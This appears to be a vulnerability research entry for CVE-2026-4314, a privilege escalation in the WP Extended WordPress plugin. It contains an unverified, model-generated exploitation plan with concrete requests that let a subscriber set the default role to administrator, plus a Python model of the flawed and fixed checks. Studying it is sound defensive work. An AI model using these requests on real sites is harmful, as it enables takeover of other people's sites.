# CVE-2026-4314: The Ultimate WordPress Toolkit – WP Extended <= 3.2.4 - Authenticated (Subscriber+) Privilege Escalation via Menu Editor Module

*   **Plugin slug:** `wpextended`
*   **Affected versions:** <= 3.2.4
*   **Patched in:** 3.2.5 (1 day to patch)
*   **Severity:** high, CVSS 8.8 (`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`)
*   **Vulnerability type:** Improper Privilege Management
*   **Published:** 2026-03-21 14:34:53, updated 2026-03-22 03:26:34
*   **Reference:** https://www.wordfence.com/threat-intel/vulnerabilities/id/38ea001c-6edb-4f36-a7ec-19be1d857b9e?source=api-prod
*   **Vulnerable release:** https://plugins.trac.wordpress.org/browser/wpextended/tags/3.2.4 (zip: https://downloads.wordpress.org/plugin/wpextended.3.2.4.zip)
*   **Fixed release:** https://plugins.trac.wordpress.org/browser/wpextended/tags/3.2.5 (zip: https://downloads.wordpress.org/plugin/wpextended.3.2.5.zip); all tags: https://plugins.trac.wordpress.org/browser/wpextended/tags
*   **Files changed in the patch:** `README.txt`, `modules/disk-usage-widget/Bootstrap.php`, `modules/menu-editor/Bootstrap.php`, `modules/menu-editor/includes/SettingsManager.php`, `vendor/autoload.php`
*   **Research status:** researched (3 rounds), not verified; the research plan below was generated by `gemini-3-flash-preview` on 2026-04-18 (00:31:00 to 00:31:59). No proof-of-concept run, video or trace is recorded for this entry, so the steps below are a plan, not a confirmed reproduction.

## Description

The 'The Ultimate WordPress Toolkit – WP Extended' plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.2.4. This is due to the `isDashboardOrProfileRequest()` method in the Menu Editor module using an insecure `strpos()` check against `$_SERVER['REQUEST_URI']` to determine whether a request targets the dashboard or profile page. The `grantVirtualCaps()` method, which is hooked into the `user_has_cap` filter, grants elevated capabilities including `manage_options` when this check returns true. This makes it possible for authenticated attackers, with Subscriber-level access and above, to gain administrative capabilities by appending a crafted query parameter to any admin URL, allowing them to update arbitrary WordPress options and ultimately create new Administrator accounts.

## Vulnerability Summary

The **The Ultimate WordPress Toolkit – WP Extended** plugin (versions <= 3.2.4) contains a privilege escalation vulnerability in its **Menu Editor** module. The module hooks into the WordPress `user_has_cap` filter via the `grantVirtualCaps()` method to grant capabilities to users dynamically, without writing them to the database.

The vulnerability stems from an insecure check in `isDashboardOrProfileRequest()`, which uses `strpos()` to test whether `$_SERVER['REQUEST_URI']` contains `/wp-admin/index.php` or `/wp-admin/profile.php`. Because `strpos()` matches the substring anywhere in the URI, query string included, an authenticated attacker (Subscriber or higher) can append one of these strings as a query parameter value (e.g., `/wp-admin/options-general.php?ignore=/wp-admin/index.php`) and pass the check. When the check returns `true`, the plugin grants the user the `manage_options` capability for the duration of that request. This allows the attacker to load administrative pages and update arbitrary WordPress options, such as enabling open registration and setting the default role to `administrator`.

## Attack Vector Analysis

*   **Endpoint:** Any administrative page under `/wp-admin/`, specifically `options-general.php` (to obtain a nonce) and `options.php` (to save settings).
*   **Vulnerable Parameter:** `$_SERVER['REQUEST_URI']` (manipulated via the query string).
*   **Authentication Level:** Authenticated Subscriber or higher.
*   **Preconditions:** The **Menu Editor** module must be enabled (the plan treats it as a core feature that is active by default).
*   **Payload:** Appending `?any_param=/wp-admin/index.php` to an admin URL.

## Code Flow

1.  **Entry Point:** An authenticated user requests a protected admin URL, e.g., `/wp-admin/options-general.php?payload=/wp-admin/index.php`.
2.  **Filter Trigger:** WordPress runs the `user_has_cap` filter while checking whether the user may access the page.
3.  **Vulnerable Hook:** `Wpextended\Modules\MenuEditor\Bootstrap::grantVirtualCaps()` is executed.
4.  **Insecure Logic:** `grantVirtualCaps` calls `isDashboardOrProfileRequest()`.
5.  **Bypass:** `isDashboardOrProfileRequest()` (in `modules/menu-editor/Bootstrap.php`) performs
    `strpos($request_uri, '/wp-admin/index.php') !== false`.
    Since the string appears in the query string, this returns `true`.
6.  **Capability Escalation:** `grantVirtualCaps` executes
    `$allcaps['manage_options'] = true;`
7.  **Sinks:**
    *   The user can load `options-general.php`, whose settings form embeds the `_wpnonce` needed to save settings.
    *   The user can then POST to `options.php` (with the same bypass string in that URL, since the grant lasts only for the current request) to update the `default_role` and `users_can_register` options.

## Nonce Acquisition Strategy

The attacker requires a valid WordPress nonce to update settings via `options.php`. Since the vulnerability grants `manage_options` to any request whose URI contains the payload string, the attacker can simply load the settings page and read the nonce out of the form.

1.  **Navigate to the General Settings page** with the bypass string:
    `URL: /wp-admin/options-general.php?ignore=/wp-admin/index.php`
2.  **Extract the nonce** from the hidden input field, e.g. in the browser console:
    `document.querySelector('input[name="_wpnonce"]').value`
3.  **Identify the `option_page`**:
    `document.querySelector('input[name="option_page"]').value` (this will be `"general"`).

## Exploitation Strategy

### Step 1: Extract Nonce
**Action:** GET request to the General Settings page.
*   **URL:** `http://localhost:8080/wp-admin/options-general.php?v=/wp-admin/index.php`
*   **Method:** `GET`
*   **Target:** Extract the values of `_wpnonce` and `_wp_http_referer`.

### Step 2: Escalation to Administrator
**Action:** POST request to `options.php` to change the site's registration settings. The bypass string must be present on this request as well, because the capability is granted per request.
*   **URL:** `http://localhost:8080/wp-admin/options.php?v=/wp-admin/index.php`
*   **Method:** `POST`
*   **Headers:** `Content-Type: application/x-www-form-urlencoded`
*   **Parameters:**
    *   `option_page`: `general`
    *   `action`: `update`
    *   `_wpnonce`: `[EXTRACTED_NONCE]`
    *   `_wp_http_referer`: `/wp-admin/options-general.php?v=/wp-admin/index.php`
    *   `users_can_register`: `1`
    *   `default_role`: `administrator`

## Test Data Setup

1.  **Plugin Installation:** Ensure `wpextended` version 3.2.4 is installed and active.
2.  **Enable Module:** Ensure the Menu Editor module is active (default).
3.  **User Creation:** Create a user with the `subscriber` role.
    `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`

## Expected Results

1.  **Initial State:** The Subscriber cannot access `options-general.php` (WordPress refuses the page with a "not allowed" error, HTTP 403, or redirects to the profile page).
2.  **During Exploit (Bypass):** The Subscriber loads `options-general.php?v=/wp-admin/index.php` and sees the full General Settings admin interface.
3.  **Final State:** The WordPress option `users_can_register` is set to `1` and `default_role` is set to `administrator`.

## Verification Steps

1.  **Verify Option Change:**
    `wp option get users_can_register` (should return `1`)
    `wp option get default_role` (should return `administrator`)
2.  **Verify Access:** Without the bypass string, the Subscriber is still denied on `/wp-admin/options-general.php`, because the capability grant only applies to requests carrying the payload. The changed options persist, however: with `users_can_register` set to `1` and `default_role` set to `administrator`, anyone can register a new account through the standard registration page (`/wp-login.php?action=register`) and receive the Administrator role.

## Alternative Approaches

If `options.php` is guarded by more than `manage_options`, use the elevated capability to reach the plugin's own settings pages or `admin-ajax.php` handlers that check only `manage_options`.

**Alternative: Admin User Creation**
1.  Navigate to `/wp-admin/user-new.php?v=/wp-admin/index.php`.
2.  Extract the `_wpnonce_create-user` nonce.
3.  POST to `/wp-admin/user-new.php?v=/wp-admin/index.php` to create a new administrator account directly. Caveat: `user-new.php` checks `create_users` (and `promote_users` to assign the role), not `manage_options`, so this path only works if `grantVirtualCaps()` also grants those capabilities. The analysis above documents only `manage_options`, so treat this alternative as unconfirmed and prefer the options-based route.
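The following is an added example, not code from the plugin or from the research above. It models in Python the substring check the plan attributes to `isDashboardOrProfileRequest()`, a hypothetical hardened replacement that compares only the decoded path component of the URI, and the `user_has_cap` grant in `grantVirtualCaps()`, then runs both checks over a set of constructed request URIs, including the query-string bypass. The request URIs and the subscriber capability map are constructed here for illustration; the real 3.2.5 fix is not reproduced, since the page lists the changed files but not the diff.

```python
"""
Model of the CVE-2026-4314 capability check (added example, not plugin code).

is_dashboard_or_profile_request_vulnerable() mirrors the strpos() substring
test described for modules/menu-editor/Bootstrap.php; the *_fixed() variant is a
hypothetical hardened check that looks only at the path component.
"""
from urllib.parse import urlsplit, unquote

DASHBOARD_PATHS = ("/wp-admin/index.php", "/wp-admin/profile.php")


def is_dashboard_or_profile_request_vulnerable(request_uri: str) -> bool:
    """Substring test, as in the vulnerable plugin: strpos($uri, $needle) !== false.
    Matches the needle anywhere in the raw REQUEST_URI, query string included."""
    return any(needle in request_uri for needle in DASHBOARD_PATHS)


def is_dashboard_or_profile_request_fixed(request_uri: str) -> bool:
    """Hypothetical fix: parse the URI and compare the decoded path only.
    Query string and fragment are discarded before the comparison, so a needle
    placed in a parameter value no longer counts."""
    path = unquote(urlsplit(request_uri).path).rstrip("/") or "/"
    return path in DASHBOARD_PATHS


def grant_virtual_caps(allcaps: dict, request_uri: str, check) -> dict:
    """Model of grantVirtualCaps() on the user_has_cap filter: returns a new
    capability map with manage_options added when `check` accepts the request."""
    caps = dict(allcaps)
    if check(request_uri):
        caps["manage_options"] = True
    return caps


# Constructed inputs: a subscriber's baseline caps and a few request URIs.
SUBSCRIBER_CAPS = {"read": True, "level_0": True}

REQUESTS = {
    "legit_dashboard": "/wp-admin/index.php",
    "legit_profile": "/wp-admin/profile.php?updated=1",
    "bypass_settings": "/wp-admin/options-general.php?ignore=/wp-admin/index.php",
    "bypass_options_post": "/wp-admin/options.php?v=/wp-admin/index.php",
    # Percent-encoded slashes do not match the raw substring test either.
    "bypass_encoded": "/wp-admin/options-general.php?x=%2Fwp-admin%2Findex.php",
    "plain_settings": "/wp-admin/options-general.php",
}


def escalates(request_uri: str, check) -> bool:
    """True when the request would leave the subscriber holding manage_options."""
    caps = grant_virtual_caps(SUBSCRIBER_CAPS, request_uri, check)
    return caps.get("manage_options", False)


def compare_checks() -> dict:
    """Run every constructed request through both checks.
    Returns name -> (vulnerable check grants, fixed check grants)."""
    return {
        name: (
            escalates(uri, is_dashboard_or_profile_request_vulnerable),
            escalates(uri, is_dashboard_or_profile_request_fixed),
        )
        for name, uri in REQUESTS.items()
    }


if __name__ == "__main__":
    for name, (vuln, fixed) in compare_checks().items():
        print(f"{name:20s} vulnerable: {vuln!s:5s} fixed: {fixed}")
```

The legitimate dashboard and profile requests pass both checks, while the two bypass URIs pass only the substring check. In a real plugin the idiomatic WordPress fix is to compare `$GLOBALS['pagenow']` (derived by core from the requested script name) against `index.php` and `profile.php` rather than inspecting `REQUEST_URI` at all.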